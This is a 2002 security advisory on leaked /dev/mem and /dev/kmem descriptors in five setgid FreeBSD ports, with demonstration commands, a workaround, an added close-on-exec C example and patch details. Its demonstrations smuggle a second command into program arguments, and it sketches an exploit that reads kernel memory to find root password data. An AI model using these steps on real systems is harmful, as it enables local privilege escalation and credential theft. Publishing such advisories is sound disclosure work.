[UNIX] FreeBSD Ports libkvm Security Vulnerabilities

From: support@securiteam.com
Date: 09/16/02


From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 16 Sep 2002 19:06:42 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  FreeBSD Ports libkvm Security Vulnerabilities
------------------------------------------------------------------------

SUMMARY

The FreeBSD ports asmon, ascpu, bubblemon, wmmon, and wmnet2 can be
locally manipulated to take advantage of open file descriptors /dev/mem
and /dev/kmem to gain root privileges on a target host. These five
programs are installed setgid kmem by default. They will drop kmem
privileges before executing user specified commands but file descriptors
to /dev/mem and /dev/kmem will remain open. This can lead to a local root
compromise in various ways (e.g. if an attacker chooses to scan for the
master password file in the Linux kernel memory).

DETAILS

The latest versions of all five of the above-mentioned FreeBSD ports are
vulnerable; the following examples illustrate the problem:

bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"

dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"

dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

bash-2.05a$ cat .wmmonrc
left "/home/dim/dummy"

bash-2.05a$ wmmon &
[1] 793

bash-2.05a$ Monitoring 5 devices for activity.
current stat is :1

bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem
dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem

bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"
wmnet: using kmem driver to monitor ec0
dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem

One possible exploit for these vulnerabilities is to replace getch() in
strings(1) with:

#include <unistd.h>

/* reads one byte from descriptor 4, the inherited /dev/mem handle */
int getch()
{
    char buf[4];
    read(4, buf, 1);
    return buf[0];
}

Or use a similar, less CPU-expensive function that reads a character from the
/dev/mem file descriptor, and then execute the following:

wmnet2 -e exploit|grep root|grep Charlie

Detection:
The latest copies of asmon, ascpu, bubblemon, wmmon, and wmnet2 from the
FreeBSD ports collection are vulnerable and were tested on FreeBSD
4.6-RELEASE. According to FreeBSD, all FreeBSD ports that use libkvm prior to
and including 4.6.2-RELEASE may also be vulnerable.

Workaround:
Remove the setgid bit from the affected applications, at the cost of reduced
functionality:

chmod g-s /path.to/wmnet2
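The chmod workaround removes the privilege altogether. The code-level fix for
the behaviour described in the summary (privileges dropped, descriptors to
/dev/mem and /dev/kmem still open across the exec of a user-specified command)
is to mark those descriptors close-on-exec before any child is started. The
following C program is an added illustration of that mechanism; it is not part
of this advisory and not FreeBSD's patch. It uses /dev/null as a stand-in for
/dev/mem so it runs unprivileged, and the helper names (set_cloexec,
fd_survives_exec) are this example's own. The child does what the lsof checks
above do: it tests whether the inherited descriptor number is still usable
after exec.

```c
/* Added example: shows that an open descriptor is inherited across execve()
 * unless FD_CLOEXEC is set on it, and how to set that flag.
 * Not part of the advisory; /dev/null stands in for /dev/mem. */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Mark a descriptor close-on-exec. Returns 0 on success, -1 on error.
 * This is what a setgid-kmem program (or the library that opened the
 * descriptor for it) must do before it exec()s anything user-controlled. */
int set_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags == -1)
        return -1;
    return fcntl(fd, F_SETFD, flags | FD_CLOEXEC);
}

/* Open a stand-in for /dev/mem, optionally mark it close-on-exec, then fork
 * and exec a shell command that tries to read from that descriptor number.
 * Returns 1 if the child could still use the descriptor (it leaked across
 * exec), 0 if the redirection failed because it was closed, -1 on error. */
int fd_survives_exec(int use_cloexec)
{
    int fd = open("/dev/null", O_RDONLY);
    if (fd == -1)
        return -1;
    if (use_cloexec && set_cloexec(fd) == -1) {
        close(fd);
        return -1;
    }

    /* "cat <&N" fails with "Bad file descriptor" in the child if N is
     * closed, so the shell's exit status tells us whether N survived. */
    char cmd[64];
    snprintf(cmd, sizeof cmd, "exec 2>/dev/null; cat <&%d", fd);

    pid_t pid = fork();
    if (pid == -1) {
        close(fd);
        return -1;
    }
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    close(fd);

    int status;
    if (waitpid(pid, &status, 0) == -1)
        return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 1 : 0;
}

int main(void)
{
    int leaked = fd_survives_exec(0);
    printf("without FD_CLOEXEC: %s\n",
           leaked == 1 ? "descriptor usable in child (leak)" : "descriptor closed");
    int fixed = fd_survives_exec(1);
    printf("with FD_CLOEXEC:    %s\n",
           fixed == 1 ? "descriptor usable in child (leak)" : "descriptor closed");
    return 0;
}
```

Two design points follow from this. First, code that opens the device itself
can avoid the race between open() and fcntl() by passing O_CLOEXEC to open()
(POSIX.1-2008). Second, when the descriptor is opened inside a library such as
libkvm, the calling program never sees the open() call, so the only reliable
place to set the flag is in the library; an application that drops group
privileges and then exec()s cannot otherwise know which descriptors the
library left behind.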

Vendor response:
The FreeBSD advisory to be released in coordination with this advisory is
FreeBSD-SA-02:39.libkvm. FreeBSD has provided the following patch details:

"Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6,
RELENG_4_5, or RELENG_4_4 security branch dated after the correction date
(4.6.2-RELEASE-p2, 4.5-RELEASE-p20, or 4.4-RELEASE-p27)."

Disclosure timeline:
August 12, 2002 - Disclosed to iDEFENSE
September 6, 2002 - Disclosed to FreeBSD Security
September 6, 2002 - Disclosed to iDEFENSE clients
September 16, 2002 - Coordinated public disclosure by FreeBSD and iDEFENSE

ADDITIONAL INFORMATION

This issue was exclusively disclosed to iDEFENSE by badc0ded
<badc0ded@badc0ded.com>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
